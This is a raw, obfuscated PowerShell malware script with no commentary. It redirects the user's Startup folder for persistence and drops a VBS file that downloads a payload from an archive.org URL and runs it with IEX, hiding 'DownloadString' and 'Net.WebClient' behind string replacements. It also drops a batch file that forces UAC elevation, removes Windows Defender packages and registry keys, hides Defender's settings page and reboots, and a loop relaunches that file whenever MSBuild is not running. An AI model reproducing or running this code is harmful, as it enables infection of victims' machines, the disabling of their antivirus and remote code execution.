$FVYTFYTFYFYFYFYFGY="C:\UsTRYCTUVYIBUCRYCTUVYIBTCRYTUYic\Run".Replace("TRYCTUVYIBUCRYCTUVYIBTCRYTUY","ers\Publ")
$YGUYGNUHYGUYGYUGYGUYGYUG = "Cr######################ory".Replace("######################","eateDirect")
[system.io.directory]::$YGUYGNUHYGUYGYUGYGUYGYUG($FVYTFYTFYFYFYFYFGY)
start-sleep -s 7
$HIUHIUHJIUHUYUUIHYIUIUHI = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
$GVFHTFYUGRTYUGYFTFYYUH= "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$JYHGYUGUYGFYTFDTRDTRDFTR = "C:\Us--------------c\Run".Replace("--------------","ers\Publi")
$BFYHGTFYHFHUYGYU8YUYYUYG ="C------------blic\Run".Replace("------------",":\Users\Pu")

Set-ItemProperty -Path $HIUHIUHJIUHUYUUIHYIUIUHI -Name "Startup" -Value $JYHGYUGUYGFYTFDTRDTRDFTR;
Set-ItemProperty -Path $GVFHTFYUGRTYUGYFTFYYUH -Name "Startup" -Value $BFYHGTFYHFHUYGYU8YUYYUYG;
start-sleep -s 7
$Content = @'
Dim HBANKERS
Set HBANKERS= CreateObject("WScript.Shell")
HHHHHHHHHHHHHHHHHHHHHHH=chr(80) +Chr(79) & Chr(87)
BBBBBBBBBBBBBBBBBBBBBBBB=Chr(69) & "r" & Chr(83) & Chr(72) & Chr(69) & Chr(76)
AAAAAAAAAAAAAAAAAAAAAAA="L $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601509.us.archive.org/14/items/ser_20210729/ser.txt';"
NNNNNNNNNNNNNNNNNNNNNNNNN = "$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');"
KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK ="$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');"
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE = "$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');"
RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR = HHHHHHHHHHHHHHHHHHHHHHH+BBBBBBBBBBBBBBBBBBBBBBBB+AAAAAAAAAAAAAAAAAAAAAAA+NNNNNNNNNNNNNNNNNNNNNNNNN++KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK+EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE+""
HBANKERS.Run RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR,0
'@
Set-Content -Path C:\Users\Public\Run\Run.vbs -Value $Content

start-sleep -s 7

$Content = @'
@echo off

>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if "%errorlevel%" NEQ "0" (
 echo: Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
 echo: UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
 "%temp%\getadmin.vbs" & exit 
)
if exist "%temp%\getadmin.vbs" del /f /q "%temp%\getadmin.vbs"

Title Remove Windows Defender

for /f "tokens=2*" %%e in ('reg query "HKEY_CLASSES_ROOT\CLSID\{5FDD51E2-A9D0-44CE-8C8D-162BA0C591A0}" /v "Version"') do set vers=%%f

if %PROCESSOR_ARCHITECTURE% EQU AMD64 (set arc=amd64) else (set arc=x86)

echo.
echo Deleting key in "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications"
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_%vers%_neutral_neutral_cw5n1h2txyewy" /f >nul 2>&1

reg delete "HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1
reg delete "HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1
reg delete "HKEY_CLASSES_ROOT\Drive\shellex\ContextMenuHandlers\EPP" /f >nul 2>&1

set pack=(Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Client-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-CloudClean-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Core-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Group-Policy-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-MDM-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Nis-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Shield-Provider-Core-Package~31bf3856ad364e35~%arc%~~%vers%)

for /d %%b in %pack% do (
echo ========================================================================
echo Deleting key in "Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\%%b\Owners"
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\%%b\Owners" /f >nul 2>&1
)

set packremove=(Windows-Defender-AM-Default-Definitions-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-amcore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-onecore-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-AppLayer-Group-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-ApplicationGuard-Inbox-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Client-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Defender-Group-Policy-Package~31bf3856ad364e35~%arc%~~%vers%,Windows-Shield-Provider-Core-Package~31bf3856ad364e35~%arc%~~%vers%)

for /d %%c in %packremove% do (
echo ========================================================================
echo Removing package %%c...
dism /online /remove-package /packagename:%%c /NoRestart
)
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f >nul 2>&1
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender" /f >nul 2>&1
echo ========================================================================
shutdown.exe /r /t 00
'@
Set-Content -Path C:\Users\Public\Run.BAT -Value $Content
start-sleep -s 7
while ($true)
{
if((get-process "MSBuild" -ea SilentlyContinue) -eq $Null){

start -file "C:\Users\Public\Run.BAT"
}
start-sleep -s 31
}